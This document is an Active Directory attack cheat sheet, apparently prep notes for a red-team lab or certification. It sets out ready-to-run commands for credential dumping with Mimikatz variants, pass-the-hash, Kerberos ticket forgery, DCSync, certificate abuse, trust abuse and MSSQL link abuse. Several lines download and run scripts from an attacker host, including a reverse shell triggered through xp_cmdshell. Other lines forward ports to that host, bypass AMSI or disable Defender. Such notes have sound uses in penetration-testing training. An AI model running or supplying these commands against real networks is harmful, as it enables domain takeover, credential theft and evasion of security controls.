// 01
AD Enumeration
AD Module
PowerShell
Import-Module Microsoft.ActiveDirectory.Management.dll Import-Module ActiveDirectory.psd1
PowerShell - AD Module Queries
Get-ADUser -Filter * | Select -ExpandProperty samaccountname
Get-ADComputer -Filter * | select -expand name
Get-ADGroup -Identity 'Domain Admins' -Properties *
Get-ADGroup -Identity <GROUP> -Properties Description
Get-ADGroupMember -Identity 'Domain Admins'
Get-ADGroupMember -Identity 'Enterprise Admins'
Get-ADGroupMember -Identity 'Enterprise Admins' -Server <PARENT_DOMAIN>
Get-ADOrganizationalUnit -Identity 'OU=<OU_NAME>,DC=<DOMAIN>,DC=local' | %{Get-ADComputer -SearchBase $_ -Filter *} | select name
Get-ACL 'AD:\CN=Domain Admins,CN=Users,DC=<DOMAIN>,DC=local' | select -ExpandProperty Access
(Get-ADForest).Domains
Get-ADTrust -Filter *
Get-ADTrust -Filter 'intraForest -ne $True' -Server (Get-ADForest).Name
(Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}
Get-ADTrust -Filter * -Server <TARGET_DOMAIN>PowerView
PowerShell - PowerView
. .\PowerView.ps1
(Get-DomainPolicy).KerberosPolicy
Get-DomainGPOLocalGroup
Get-DomainGroupMember -Identity <GROUP>
Get-DomainOU
(Get-DomainOU -Identity <OU>).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
Get-DomainGPO
(Get-DomainOU -Identity <OU>).gplink
Get-DomainGPO -Identity '{<GPO_ID>}'
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<USER>"}
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<GROUP>"}
Get-ForestDomain -Verbose | Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'}
Get-ForestTrust -Forest <FOREST>// 02
Local Privilege Escalation
PowerUp
PowerShell
. .\PowerUp.ps1 Invoke-AllChecks Invoke-ServiceAbuse -Name <SERVICE> -UserName <DOMAIN>\<USER> -Verbose
Manual Service Abuse (accesschk64)
CMD
.\accesschk64.exe -uwcqv '<USER>' * sc.exe config <SERVICE> binPath= "net localgroup administrators <DOMAIN>\<USER> /add" sc.exe stop <SERVICE> sc.exe start <SERVICE> sc.exe config <SERVICE> binPath= "<ORIGINAL_BINPATH>" sc.exe stop <SERVICE> sc.exe start <SERVICE>
Find Local Admin Access
PowerShell
Find-LocalAdminAccess -Verbose Find-WMILocalAdminAccess.ps1 Find-PSRemotingLocalAdminAccess.ps1
Recursive Group Membership
PowerShell
function Get-ADPrincipalGroupMembershipRecursive ($SamAccountName) {
$groups = @(Get-ADPrincipalGroupMembership -Identity $SamAccountName | select -ExpandProperty distinguishedname)
$groups
if ($groups.count -gt 0) {
foreach ($group in $groups) {
Get-ADPrincipalGroupMembershipRecursive $group
}
}
}ACL Enumeration
PowerShell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match '<GROUP>'}
Get-DomainObjectAcl -Identity <GROUP> -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match '<TARGET_GROUP>'}// 03
LAPS - Local Admin Password Solution
Enumeration
PowerShell
Import-Module AdmPwd.PS.psd1 -Verbose Get-LapsPermissions.ps1
Find LAPS Read Permissions (PowerView)
PowerShell
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier); $_}Read Cleartext Password
PowerShell
# AD Module Get-ADComputer -Identity <COMPUTER> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd # AdmPwd Module Get-AdmPwdPassword -ComputerName <COMPUTER> # PowerView Get-DomainObject -Identity <COMPUTER> | select -ExpandProperty ms-mcs-admpwd
Access Machine with LAPS Password
PowerShell
winrs -r:<COMPUTER> -u:.\administrator -p:<LAPS_PASSWORD> cmd
$passwd = ConvertTo-SecureString '<LAPS_PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<COMPUTER>\administrator", $passwd)
$session = New-PSSession -ComputerName <COMPUTER> -Credential $creds// 04
Credential Extraction
Copy Loader & Dump Credentials
CMD
# Copy loader to target echo F | xcopy Loader.exe \\<TARGET>\C$\Users\Public\Loader.exe # Setup port forwarding to avoid detection winrs -r:<TARGET> -u:.\administrator -p:<PASSWORD> cmd netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<ATTACKER_IP> # Dump credentials C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::keys
BitsAdmin (Signed Binary) for Download
CMD
bitsadmin /transfer WindowsUpdates /priority normal http://127.0.0.1:8080/Loader.exe C:\\Users\\Public\\Loader.exe
PowerShell Remoting & Invoke-Mimi
PowerShell
$passwd = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<TARGET>\administrator", $passwd)
$session = New-PSSession -ComputerName <TARGET> -Credential $creds
# Bypass AMSI first, then:
Invoke-Command -FilePath Invoke-Mimi.ps1 -Session $session
Enter-PSSession $session
Invoke-Mimi -Command '"sekurlsa::keys"'// 05
gMSA - Group Managed Service Accounts
PowerShell - Enumerate gMSA
Get-ADServiceAccount -Filter * Get-ADServiceAccount -Identity <GMSA_ACCOUNT> -Properties * | select PrincipalsAllowedToRetrieveManagedPassword
You need a shell as the user who has permission to read the gMSA password.
PowerShell - Extract & Decode Password
# Import AD Module, then: $Passwordblob = (Get-ADServiceAccount -Identity <GMSA_ACCOUNT> -Properties msDS-ManagedPassword).'msDS-ManagedPassword' # Decode with DSInternals Import-Module DSInternals.psd1 $decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword # Then PTH with the extracted hash to check access
// 06
Pass The Hash
OverPass-The-Hash (Elevated Shell)
CMD
# Using AES256 SafetyKatz.exe "sekurlsa::opassth /user:<USER> /domain:<DOMAIN> /aes256:<AES256_HASH> /run:cmd.exe" "exit" # Using NTLM SafetyKatz.exe "sekurlsa::opassth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:cmd.exe" "exit" # S4U with Rubeus Rubeus.exe s4u /user:<USER> /aes256:<AES256_HASH> /impersonateuser:administrator /msdsspn:CIFS/<TARGET.DOMAIN> /altservice:HTTP /domain:<DOMAIN> /ptt
From Non-Elevated Shell
CMD
Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /aes256:<AES256_HASH> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
// 07
AppLocker, CLM & WDAC
PowerShell
# Check if PowerShell is in Constrained Language Mode $ExecutionContext.SessionState.LanguageMode # Check AppLocker (error = not in use) reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2 Get-AppLockerPolicy -Effective # Check WDAC Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard # CodeIntegrityPolicyEnforcementStatus : 2 = Enforced # UsermodeCodeIntegrityPolicyEnforcementStatus : 2 = Enforced
// 08
Unconstrained Delegation
Find Unconstrained Delegation
PowerShell
Get-ADComputer -Filter {TrustedForDelegation -eq $True}Printer Bug Abuse
Access the machine with Unconstrained Delegation first, then monitor for incoming TGTs.
CMD
# Copy Rubeus to the UD machine echo F | xcopy Rubeus.exe \\<UD_MACHINE>\C$\Users\Public\Rubeus.exe /Y # Monitor for incoming TGTs winrs -r:<UD_MACHINE> cmd.exe C:\Users\Public\Rubeus.exe monitor /targetuser:<DC>$ /interval:5 /nowrap # Trigger the Printer Bug from another shell MS-RPRN.exe \\<DC.DOMAIN> \\<UD_MACHINE.DOMAIN> # Inject the captured TGT Rubeus.exe ptt /ticket:<BASE64_TGT> # DCSync with the DC ticket SharpKatz.exe --Command dcsync --User <DOMAIN>\krbtgt --Domain <DOMAIN> --DomainController <DC.DOMAIN>
Alternative: PowerShell Remoting
PowerShell
$session = New-PSSession <UD_MACHINE> Copy-Item -ToSession $session -Path Rubeus.exe -Destination C:\Users\Public Enter-PSSession $session cd C:\Users\Public .\Rubeus.exe monitor /targetuser:<DC>$ /interval:5 /nowrap
Cross-Forest (If TGT Delegation Enabled)
CMD
# Same technique but target the foreign forest DC # 1. Get TGT and access UD machine # 2. Send Rubeus to UD machine # 3. Monitor for foreign DC TGT # 4. Trigger MS-RPRN against foreign DC # 5. PTT and DCSync foreign forest SharpKatz.exe --Command dcsync --User <FOREIGN_DOMAIN>\krbtgt --Domain <FOREIGN_DOMAIN> --DomainController <FOREIGN_DC>
// 09
Constrained Delegation
Find Constrained Delegation
PowerShell
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
# Cross-forest
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo -Server <TARGET_DOMAIN>S4U Abuse with Rubeus
CMD
# Generate RC4 hash from password Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN> # S4U to get LDAP ticket (for DCSync) Rubeus.exe s4u /user:<USER> /rc4:<RC4_HASH> /impersonateuser:Administrator /domain:<DOMAIN> /msdsspn:nmagent/<DC.DOMAIN> /altservice:ldap /dc:<DC.DOMAIN> /ptt # DCSync with LDAP service ticket SharpKatz.exe --Command dcsync --User <DOMAIN>\krbtgt --Domain <DOMAIN> --DomainController <DC.DOMAIN> SharpKatz.exe --Command dcsync --User <DOMAIN>\administrator --Domain <DOMAIN> --DomainController <DC.DOMAIN>
// 10
ACL Abuse & RBCD
Enumerate ACL Permissions
PowerShell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match '<USER>'}Resource-Based Constrained Delegation (RBCD)
If you have GenericWrite over a computer object, you can set RBCD.
PowerShell
# Set RBCD $comps = '<MACHINE1>$','<MACHINE2>$' Set-ADComputer -Identity <TARGET> -PrincipalsAllowedToDelegateToAccount $comps -Verbose # Extract AES key of your machine (SID S-1-5-18 = SYSTEM) SafetyKatz.exe -Command "sekurlsa::keys" "exit" # S4U to get HTTP access Rubeus.exe s4u /user:<MACHINE>$ /aes256:<AES256_HASH> /msdsspn:http/<TARGET> /impersonateuser:administrator /ptt # S4U to get CIFS access (file system) Rubeus.exe s4u /user:<MACHINE>$ /aes256:<AES256_HASH> /msdsspn:cifs/<TARGET> /impersonateuser:administrator /ptt # Copy loader and dump credentials echo F | xcopy Loader.exe \\<TARGET>\C$\Users\Public\Loader.exe /Y winrs -r:<TARGET> cmd netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<ATTACKER_IP> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
// 11
Golden & Silver Tickets
Golden Ticket
CMD - BetterSafetyKatz
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /aes256:<KRBTGT_AES256> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" klist
Golden Ticket with Invoke-Mimi
PowerShell
. .\Invoke-Mimi.ps1
Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /aes256:<KRBTGT_AES256> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
$sess = New-PSSession <TARGET>
Enter-PSSession -Session $sess
# Bypass AMSI, then:
Invoke-Command -FilePath Invoke-Mimi.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimi -Command '"lsadump::lsa /patch"'Silver Ticket
CMD
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /target:<TARGET_SERVER> /service:HOST /aes256:<SERVICE_AES256> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" klist
// 12
DCSync
Check Replication Rights
PowerShell
Get-DomainObjectAcl -SearchBase "dc=<DOMAIN>,dc=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "<USER>"}Add DCSync Rights (Requires DA)
PowerShell
# PowerView Add-DomainObjectAcl -TargetIdentity "dc=<DOMAIN>,dc=local" -PrincipalIdentity <USER> -Rights DCSync -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose # AD Module with RACE toolkit Set-ADACL -DistinguishedName 'DC=<DOMAIN>,DC=local' -SamAccountName <USER> -GUIDRight DCSync -Verbose
Execute DCSync
CMD
SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\krbtgt" "exit"
# Or with Invoke-Mimi
Invoke-Mimi -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'// 13
AD CS - Certificates
Enumerate Certificate Authorities
CMD
Certify.exe cas Certify.exe find Certify.exe find /enrolleeSuppliesSubject
ENROLLEE_SUPPLIES_SUBJECT means you can request a certificate for ANY user.
Request Certificate as Another User (ESC1)
CMD
# Request cert as Administrator Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<VULNERABLE_TEMPLATE> /altname:Administrator # Save output between BEGIN RSA PRIVATE KEY and END CERTIFICATE as cert.pem # Convert to PFX openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out DA.pfx # Request TGT as DA Rubeus.exe asktgt /user:Administrator /certificate:DA.pfx /password:<PFX_PASSWORD> /nowrap /ptt winrs -r:<DC> whoami
Escalate to Enterprise Admin
CMD
# Request and convert cert for EA, then:
Rubeus.exe asktgt /user:<PARENT_DOMAIN>\Administrator /dc:<PARENT_DC> /certificate:EA.pfx /password:<PFX_PASSWORD> /nowrap /ptt
winrs -r:<PARENT_DC> whoami// 14
Azure AD Connect
Find MSOL Account
PowerShell
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server <DOMAIN> -Properties * | select SamAccountName,Description | fl
Extract MSOL Credentials
PowerShell
# Get access to the AD Connect server Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /aes256:<AES256_HASH> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt # Copy InviShell to target echo F | xcopy InShellProf.dll \\<ADCONNECT_SERVER>\C$\Users\<USER>\Downloads\InShellProf.dll /Y echo F | xcopy RunWithRegistryNonAdmin.bat \\<ADCONNECT_SERVER>\C$\Users\<USER>\Downloads\RunWithRegistryNonAdmin.bat /Y # Access and extract winrs -r:<ADCONNECT_SERVER> cmd RunWithRegistryNonAdmin.bat iex (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/adconnect.ps1') ADconnect
DCSync with MSOL Account
CMD
runas /user:<DOMAIN>\<MSOL_ACCOUNT> /netonly cmd SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\administrator /domain:<DOMAIN>" "exit"
// 15
Domain Privesc - Trust Key & KRBTGT
Extract Trust Key
CMD
# Access DC with DA privileges Rubeus.exe asktgt /user:administrator /aes256:<AES256_HASH> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt # Copy loader and dump trust keys echo F | xcopy Loader.exe \\<DC>\C$\Users\Public\Loader.exe /Y winrs -r:<DC> cmd netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<ATTACKER_IP> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe lsadump::trust /patch # Grab RC4 of child domain -> parent domain trust
Inter-Realm TGT with Trust Key
CMD
BetterSafetyKatz.exe "kerberos::golden /domain:<CHILD_DOMAIN> /sid:<CHILD_SID> /sids:<PARENT_SID>-519 /rc4:<TRUST_RC4> /user:Administrator /service:krbtgt /target:<PARENT_DOMAIN> /ticket:trust_tkt.kirbi" "exit" Rubeus.exe asktgs /ticket:trust_tkt.kirbi /service:CIFS/<PARENT_DC> /dc:<PARENT_DC> /ptt klist dir \\<PARENT_DC>\c$
Using KRBTGT Hash (SID History)
CMD
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<CHILD_DOMAIN> /sid:<CHILD_SID> /krbtgt:<KRBTGT_HASH> /sids:<PARENT_SID>-519 /ptt" "exit" klist winrs -r:<PARENT_DC> cmd
// 16
Forest Trust Abuse
Forge Inter-Realm TGT
CMD
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<TRUST_RC4> /service:krbtgt /target:<FOREIGN_DOMAIN> /sids:<FOREIGN_EA_SID>-519 /ticket:cross_forest.kirbi" "exit" Rubeus.exe asktgs /ticket:cross_forest.kirbi /service:CIFS/<FOREIGN_DC> /dc:<FOREIGN_DC> /ptt dir \\<FOREIGN_DC>\<SHARE_NAME>
SID History Injection (Cross-Forest)
PowerShell
# Check for groups with SID > 1000
Get-ADGroup -Filter 'SID -ge "S-1-5-21-<FOREIGN_DOMAIN_ID>-1000"' -Server <FOREIGN_DOMAIN>
CMD
# Create ticket with SIDHistory of target group BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<TRUST_RC4> /service:krbtgt /target:<FOREIGN_DOMAIN> /sids:<TARGET_GROUP_SID> /ticket:sidhistory.kirbi" "exit" # Request TGS for HTTP (PSRemoting) Rubeus.exe asktgs /ticket:sidhistory.kirbi /service:HTTP/<FOREIGN_SERVER> /dc:<FOREIGN_DC> /ptt winrs -r:<FOREIGN_SERVER> cmd
// 17
MSSQL Abuse
Enumerate SQL Links
PowerShell - PowerUpSQL
Import-Module PowerupSQL.psd1
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink -Instance <SQL_SERVER> -Verbose
Get-SQLServerLinkCrawl -Instance <SQL_SERVER> -Verbose
# Execute commands through links
Get-SQLServerLinkCrawl -Instance <SQL_SERVER> -Query 'exec master..xp_cmdshell ''whoami'''Reverse Shell via SQL Links
PowerShell
# Start listener . .\powercat.ps1 powercat -l -v -p 443 -t 1000 # Trigger reverse shell through SQL link Get-SQLServerLinkCrawl -Instance <SQL_SERVER> -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://<ATTACKER_IP>/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://<ATTACKER_IP>/amsibypass.txt);iex (iwr -UseBasicParsing http://<ATTACKER_IP>/Invoke-PowerShellTcpEx.ps1)"'''
Enable RPC Out & xp_cmdshell (SA Required)
PowerShell
Invoke-SqlCmd -Query "exec sp_serveroption @server='<LINKED_SERVER>', @optname='rpc', @optvalue='TRUE'"
Invoke-SqlCmd -Query "exec sp_serveroption @server='<LINKED_SERVER>', @optname='rpc out', @optvalue='TRUE'"
Invoke-SqlCmd -Query "EXECUTE ('sp_configure ''show advanced options'',1;reconfigure;') AT ""<LINKED_SERVER>"""
Invoke-SqlCmd -Query "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure') AT ""<LINKED_SERVER>"""
# Execute on specific target in the link chain
Get-SQLServerLinkCrawl -Instance <SQL_SERVER> -Query 'exec master..xp_cmdshell ''whoami''' -QueryTarget <LINKED_SERVER>// 18
Foreign Security Principals
PowerShell
# Enumerate trust relationships Get-ForestTrust # Look for: TrustType = Forest, TrustDirection = Bidirectional # Find interesting ACLs in foreign domain Find-InterestingDomainAcl -ResolveGUIDs -Domain <FOREIGN_DOMAIN> # Look for: GenericAll over an ObjectDN # If you have GenericAll, reset the password Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force) -Domain <FOREIGN_DOMAIN> -Verbose # Enumerate FSPs Find-ForeignGroup -Verbose # Identify the user behind the SID Get-DomainUser -Domain <FOREIGN_DOMAIN> | ?{$_.ObjectSid -eq '<FSP_SID>'}
Access Foreign Domain
PowerShell
# WinRS winrs -r:<FOREIGN_DC> -u:<FOREIGN_DOMAIN>\<USER> -p:<PASSWORD> "whoami" # PSRemoting $passwd = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential ("<FOREIGN_DOMAIN>\<USER>", $passwd) $session = New-PSSession -Computername <FOREIGN_DC> -Credential $creds Invoke-Command -scriptblock{whoami;hostname} -Session $session
// 19
PAM Trust
Enumerate Foreign Security Principals
PowerShell
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server <DOMAIN>
# Find which DA group the FSP belongs to
Get-ADGroup -Filter * -Properties Member -Server <DOMAIN> | ?{$_.Member -match '<FSP_SID>'}Check PAM Trust
PowerShell
Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
# Look for: ForestTransitive = True, SIDFilteringForestAware = FalseCheck Shadow Principals
PowerShell
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name, member, msDS-ShadowPrincipalSid | flAccess via PAM Trust
PowerShell
# Get DA access and enumerate further forests Rubeus.exe asktgt /domain:<DOMAIN> /user:administrator /aes256:<AES256_HASH> /dc:<DC> /createnetonly:C:\Windows\System32\cmd.exe /show /ptt # Check PAM in further forests Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} -Server <TARGET_FOREST> # Look for: SIDFilteringForestAware = True # Get target forest IP Get-DnsServerZone -ZoneName <TARGET_FOREST> | fl * # Modify TrustedHosts (elevated shell required) Set-Item WSMan:\localhost\Client\TrustedHosts * -Force # Access via PSRemoting SafetyKatz.exe "sekurlsa::opassth /user:administrator /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:powershell.exe" "exit" Enter-PSSession <TARGET_IP> -Authentication NegotiateWithImplicitCredential
// 20
Recurring Commands
BloodHound Collection
CMD
SharpHound.exe --CollectionMethods All
Module Imports
PowerShell
# InviShell (bypass) RunWithRegistryNonAdmin.bat # AD Module Import-Module Microsoft.ActiveDirectory.Management.dll Import-Module ActiveDirectory.psd1 # PowerView . .\PowerView.ps1 # Invoke-Mimi . .\Invoke-Mimi.ps1
Common Access Methods
PowerShell
# WinRS winrs -r:<TARGET> cmd winrs -r:<TARGET> -u:.\administrator -p:<PASSWORD> cmd # PSSession $passwd = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USER>", $passwd) $session = New-PSSession -ComputerName <TARGET> -Credential $creds # Copy files echo F | xcopy Loader.exe \\<TARGET>\C$\Users\Public\Loader.exe /Y # Port forwarding netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<ATTACKER_IP> # Download from attacker iex (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/<SCRIPT>.ps1')
Find Remote Access
PowerShell
. .\Find-PSRemotingLocalAdminAccess.ps1 Find-PSRemotingLocalAdminAccess -Domain <DOMAIN> -Verbose
Get Domain SID
PowerShell
Get-DomainSID Get-DomainSID -Domain <TARGET_DOMAIN>
AMSI Bypass
PowerShell
# Use obfuscated AMSI bypass before running any PowerShell tools # Multiple techniques available - use the one that works in your environment
Disable AV (If Admin)
PowerShell
Set-MpPreference -DisableRealtimeMonitoring $true
Runas with Network Credentials
CMD
runas /user:<DOMAIN>\<USER> /netonly cmd
DCSync
CMD
SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\administrator /domain:<DOMAIN>" "exit"
Enumerate Resources
CMD
dir \\<DC>\c$